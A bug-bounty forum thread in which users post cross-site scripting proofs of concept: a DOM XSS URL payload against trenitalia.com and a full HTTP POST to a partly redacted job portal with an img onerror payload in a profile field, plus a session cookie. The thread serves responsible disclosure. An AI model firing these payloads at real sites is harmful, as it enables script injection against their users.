DOM XSS trenitalia.com

Your experience of helping website owners
Locked
evaristegal0is
Posts:19
Joined:Mon Feb 20, 2017 5:14 pm
DOM XSS trenitalia.com

Post by evaristegal0is » Tue Jun 13, 2017 1:17 pm

There is a DOM XSS, visible on Chrome, in site http://www.trenitalia.com
http://www.trenitalia.com/#"><img src=x onerror=prompt('OPENBUGBOUNTY')>
Image

I try to report it on OBB, but the site doesn't approve it for some reason

User avatar
x1admin
Site Admin
Posts:3101
Joined:Sun Nov 15, 2015 7:04 pm

Re: DOM XSS trenitalia.com

Post by x1admin » Wed Jun 14, 2017 10:20 am


Manojkhd
Posts:19
Joined:Thu Mar 19, 2020 3:48 pm

Re: DOM XSS trenitalia.com

Post by Manojkhd » Sun Apr 12, 2020 2:17 pm

Hello admin
how can i submission suck example parameter name="summary" when check /Jobseeker/dashboard reflected Cross-site scripting (DOM-based)? :roll: code PoC

POST /Jobseeker/updatePersonalDetail/38318 HTTP/1.1
Host: xxx.com.np
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xxx.com.np/Jobseeker/editProfile
Cookie: mycookiename=252060169693efce0d5887f42afbba83bdde7479; _ga=GA1.3.1449882869.1586698060; _gid=GA1.3.1881890604.1586698060; _gat_gtag_UA_51173775_3=1; _gat_gtag_UA_137271813_1=1; _gat_gtag_UA_160188939_1=1
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------1451056368887
Content-Length: 6572

-----------------------------1451056368887
Content-Disposition: form-data; name="email2"

[email protected]
-----------------------------1451056368887
Content-Disposition: form-data; name="summary"

<img src=x onerror=alert('openbugbounty')>
-----------------------------1451056368887
Content-Disposition: form-data; name="salutation"

14
-----------------------------1451056368887
Content-Disposition: form-data; name="fname"

Victim-Hacked
-----------------------------1451056368887
Content-Disposition: form-data; name="mname"

Firefox-gothacked
-----------------------------1451056368887
Content-Disposition: form-data; name="lname"

CSRF-Now
-----------------------------1451056368887
Content-Disposition: form-data; name="gender"

Female
-----------------------------1451056368887
Content-Disposition: form-data; name="mm"

9
-----------------------------1451056368887
Content-Disposition: form-data; name="dd"

10
-----------------------------1451056368887
Content-Disposition: form-data; name="yy"

1985
-----------------------------1451056368887
Content-Disposition: form-data; name="nationality"

31
-----------------------------1451056368887
Content-Disposition: form-data; name="phoneres"

035420132
-----------------------------1451056368887
Content-Disposition: form-data; name="phoneoff"

033332525
-----------------------------1451056368887
Content-Disposition: form-data; name="phonecell"

9800000001
-----------------------------1451056368887
Content-Disposition: form-data; name="phonecell2"

9801212120
-----------------------------1451056368887
Content-Disposition: form-data; name="maritalstatus"

Single
-----------------------------1451056368887
Content-Disposition: form-data; name="currentadd"

Old Road
-----------------------------1451056368887
Content-Disposition: form-data; name="currentcon"

HK
-----------------------------1451056368887
Content-Disposition: form-data; name="permanentadd"

NYC
-----------------------------1451056368887
Content-Disposition: form-data; name="permanentcon"

US
-----------------------------1451056368887
Content-Disposition: form-data; name="picture_previous"

29-Hotel-Icon-Has-Internet-5e8c09d5c86aa1.80624002.png
-----------------------------1451056368887
Content-Disposition: form-data; name="picture"; filename=""
Content-Type: application/octet-stream


-----------------------------1451056368887
Content-Disposition: form-data; name="citizenship_previous"


-----------------------------1451056368887
Content-Disposition: form-data; name="citizenship"; filename=""
Content-Type: application/octet-stream


-----------------------------1451056368887
Content-Disposition: form-data; name="latest_education_qualification"

bachelor
-----------------------------1451056368887
Content-Disposition: form-data; name="other_faculty"


-----------------------------1451056368887
Content-Disposition: form-data; name="slc_docs_previous"


-----------------------------1451056368887
Content-Disposition: form-data; name="slc_docs"; filename=""
Content-Type: application/octet-stream


-----------------------------1451056368887
Content-Disposition: form-data; name="docs_11_12_previous"


-----------------------------1451056368887
Content-Disposition: form-data; name="docs_11_12"; filename=""
Content-Type: application/octet-stream


-----------------------------1451056368887
Content-Disposition: form-data; name="bachelor_docs_previous"


-----------------------------1451056368887
Content-Disposition: form-data; name="bachelor_docs"; filename=""
Content-Type: application/octet-stream


-----------------------------1451056368887
Content-Disposition: form-data; name="masters_docs_previous"


-----------------------------1451056368887
Content-Disposition: form-data; name="masters_docs"; filename=""
Content-Type: application/octet-stream


-----------------------------1451056368887
Content-Disposition: form-data; name="other_docs_previous"


-----------------------------1451056368887
Content-Disposition: form-data; name="other_docs"; filename=""
Content-Type: application/octet-stream


-----------------------------1451056368887
Content-Disposition: form-data; name="workexp"

Yes
-----------------------------1451056368887
Content-Disposition: form-data; name="expyrs"

5
-----------------------------1451056368887
Content-Disposition: form-data; name="expmths"

1
-----------------------------1451056368887
Content-Disposition: form-data; name="cjobposiiton"

IT scurity- Pentesting openbugbounty
-----------------------------1451056368887
Content-Disposition: form-data; name="keyskills"

Pentesting Kali Linux great used after
-----------------------------1451056368887
Content-Disposition: form-data; name="preunit"

NPR
-----------------------------1451056368887
Content-Disposition: form-data; name="presal"

150000.00
-----------------------------1451056368887
Content-Disposition: form-data; name="expunit"

NPR
-----------------------------1451056368887
Content-Disposition: form-data; name="exptype"

Equals
-----------------------------1451056368887
Content-Disposition: form-data; name="expsal"

154
-----------------------------1451056368887
Content-Disposition: form-data; name="job_region"

296
-----------------------------1451056368887
Content-Disposition: form-data; name="joblocation"

92
-----------------------------1451056368887
Content-Disposition: form-data; name="joblocation2"

IT
-----------------------------1451056368887
Content-Disposition: form-data; name="funcarea1"

204
-----------------------------1451056368887
Content-Disposition: form-data; name="natureoforg1[]"

Security Providers
-----------------------------1451056368887
Content-Disposition: form-data; name="funcarea2"

269
-----------------------------1451056368887
Content-Disposition: form-data; name="natureoforg2[]"

Automobiles Sales & Services
-----------------------------1451056368887
Content-Disposition: form-data; name="natureoforg2[]"

IT-Hardware & Software Services
-----------------------------1451056368887
Content-Disposition: form-data; name="resume_previous"


-----------------------------1451056368887
Content-Disposition: form-data; name="resume"; filename=""
Content-Type: application/octet-stream


-----------------------------1451056368887
Content-Disposition: form-data; name="submit"


-----------------------------1451056368887--

User avatar
x1admin
Site Admin
Posts:3101
Joined:Sun Nov 15, 2015 7:04 pm

Re: DOM XSS trenitalia.com

Post by x1admin » Mon Apr 13, 2020 7:18 am

Our report form have examples

Locked

Who is online

Users browsing this forum: No registered users and 2 guests